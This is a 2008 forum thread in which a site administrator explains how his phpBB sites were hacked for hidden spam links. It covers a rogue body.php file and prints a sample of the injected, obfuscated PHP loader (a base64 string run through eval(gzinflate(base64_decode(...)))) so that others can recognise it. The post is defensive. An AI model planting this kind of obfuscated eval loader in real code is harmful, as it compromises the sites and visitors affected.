Battling the Hackers

Post Reply
User avatar
Turboladdade
1024 MB
Posts: 1420
Joined: October 31st, 2007, 10:44 pm

Battling the Hackers

Post by Turboladdade » December 6th, 2008, 10:16 am

Every now and then Info-Mac or System 7 Today (or both) are hacked. This usually results in hundreds or thousands of garbage links to generic medication and porn being attached to the bottom of every page in a hidden div. You cannot see it, but search engines can, and this presumably is an attempt to get higher search engine rankings.

Sometimes, the hackers are merely changing template or html files. These are pretty easy to track down, simply open up your template files and see what's not right.

In the /includes folder of my Info-Mac phpBB 3 folder, I found a rogue file named body.php. It had neither a recent modified nor creation date, so it was hard to find, but I did find it by comparing what was supposed to be in that folder, and what actually was. One extra file! Opening it shows a lot of hacker-ish code, including a big ASCII spider.

Other times, they change the PHP or other scripting files. This is harder to track down, but I wanted to share some code from the most recent hacking situation so that others may find it useful and know what to look out for.

I had this inserted into many PHP files here at Info-Mac. It's creating a variable named sosddsfagck. Basically it's gzipped content that is being told to unzip. The gzipped content itself includes more encrypted php code. But this is the format of what I saw:

Code: Select all

$sosddsfagck='bZBBa8MwDIXvhf4HEQq2ISQdvYyWwi5jPe6Q2z';
$sosddsfagck=$sosddsfagck.'pGltqtmWMZWVvGxv77vGQZWalPst7T45M0EdIT';
$sosddsfagck=$sosddsfagck.'6YDE1h/lUm3ms0XE5gW2cGN+CgzaS/FRG0t1h+';
$sosddsfagck=$sosddsfagck.'QORYOtyOG691oje7uazz4XDXrWnrdZlhQA05Fl';
$sosddsfagck=$sosddsfagck.'DYMhB3F3W8GJOazL8iyuXDkbeVXwO8Ouqu7Lq2';
$sosddsfagck=$sosddsfagck.'IpimxPe5+pi1k7jLyGc6phZDLWnazTcgR7eExb';
$sosddsfagck=$sosddsfagck.'maPm+Buk1GbUkmLb4PCgpUjbje0hRr/VTjLZVs';
$sosddsfagck=$sosddsfagck.'bX58j0l5hD+gWMk8YEIb0BvnEYR/j+wv8u9fUN';
eval(gzinflate(base64_decode($sosddsfagck)));
So basically, any PHP script that is telling you to evaluate (run as PHP) the contents of a string decoded from base64 is highly suspect.
I am now telling the computer exactly what it can do.
User avatar
kriegvision
32 MB
Posts: 49
Joined: September 10th, 2008, 2:19 pm

Re: Battling the Hackers

Post by kriegvision » December 11th, 2008, 11:00 am

That's what happen when one modifies phpBB a lot. Lots of exploitable bugs get introduced!

It's a shame, really, that hackers can't find better things to do with their skills than post porno and generic pills. I've always wondered, how exactly is that a lucrative job? Who is paying these people and for what? It's not like those links ever get clicked, and they're always taken down within days, creating broken links to nowhere.
Post Reply